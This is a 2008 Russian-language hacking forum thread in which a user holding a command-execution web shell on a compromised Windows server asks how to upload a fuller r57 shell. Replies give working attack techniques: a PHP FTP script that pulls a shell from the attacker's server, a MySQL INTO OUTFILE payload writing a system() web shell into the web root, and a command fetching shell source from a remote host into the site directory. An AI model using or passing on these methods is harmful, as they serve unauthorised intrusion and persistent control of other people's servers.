Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.07.2008, 22:42
|
|
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488
Репутация:
2
|
|
Способы заливки файлов
Есть shell.php?cmd= .
Хотел залить более менее удобный шелл типа r57.
Всё что пришло в голову:
1)Заливка через FTP с поднятием на своём компе сервера, но не смог пока разобраться с авторизацией в slimftpd.
2)Расшарить папку
3)И пробовал записать построчно через echo (добавляются слэши перед кавычками в итоге скрипт не пашет)
Может кто нибудь предложить другие способы?
|
|
|
30.07.2008, 23:33
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
wget, curl, fetch
|
|
|
|
31.07.2008, 00:02
|
|
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488
Репутация:
2
|
|
Сорри не уточнил.Дело происходит в винде
|
|
|
|
31.07.2008, 00:23
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Если есть возможность выполнить пхп - через fopen(), да и многими другими функциями можно. Я так понял - шелл ты сам залил? Раз залил шелл - залей инклюд или тот же fopen() -> fwrite()
з.ы. вот ещё почитай про работу с фтп через командную строку - ttp://www.winblog.ru/net/1147765001-08020803.html
Последний раз редактировалось n0ne; 31.07.2008 в 00:26..
|
|
|
|
31.07.2008, 15:53
|
|
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488
Репутация:
2
|
|
инклюд нельзя (
Можно про fopen() и fwrite() поподробнее?
Я пхп совсем не знаю ((
|
|
|
|
31.07.2008, 17:05
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Попробуй через фтп вот так -
Код:
<?
// замени данные на свои
$host = "ftp.твой_фтп.ru"; // адрес твоего фтп
$port = 21; // порт, по дефолту он 21
$user = "login"; // логин
$passwrod = "password"; // пароль
$local_file = "/ftp/shell.php"; // файл на твоем фтп
$remote_file = "shell.php"; // файл на удаленной тачке
// дальше не трогай :)
$connect = ftp_connect($host, $port);
$done = ftp_login($connect, $user, $password);
if($done)
{
ftp_get($connect, $local_file, $remote_file, ftp_binary);
}
else
{
die();
}
?>
И не поленись прочесть вот это - ttp://www.winblog.ru/net/1147765001-08020803.html
Последний раз редактировалось n0ne; 31.07.2008 в 17:07..
|
|
|
|
31.07.2008, 17:13
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
если есть какая либо база на сайте попробуй приконнектиться к ней с удаленного шела и уже через базу залить шел
CREATE TABLE temptab1(
codetab TEXT
) TYPE=MYISaM;
INSERT INTO temptab1(codetab)
VALUES(
'<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>'
);
into dumpfile
select * into outfile '/Library/WebServer/Documents/123.php' from temptab1; flush logs;
думаю разберешься что куда ставить
Последний раз редактировалось heks; 31.07.2008 в 17:19..
|
|
|
|
31.07.2008, 17:44
|
|
Новичок
Регистрация: 24.12.2006
Сообщений: 2
Провел на форуме:
18610
Репутация:
14
|
|
Попробуй так:
shell.php?cmd=get http://site/r57.txt > C:\путь_до_www\r57.php
(по дефолту в C:\AppServ\www\)
"http://site/r57.txt " - сайт на котором лежит исходник шела в txt формате... (если будет в php формате многие выражения понерфяться, что соответственно приведёт к неработоспособности шела, поэтому используй изначально txt)
Последний раз редактировалось apollо; 31.07.2008 в 17:49..
|
|
|
|
31.07.2008, 19:23
|
|
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488
Репутация:
2
|
|
apollо
"get" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
Я тоже об этом думал
|
|
|
|
31.07.2008, 19:24
|
|
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488
Репутация:
2
|
|
heks
К сожалению нет.
bind-adress 127.0.0.1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
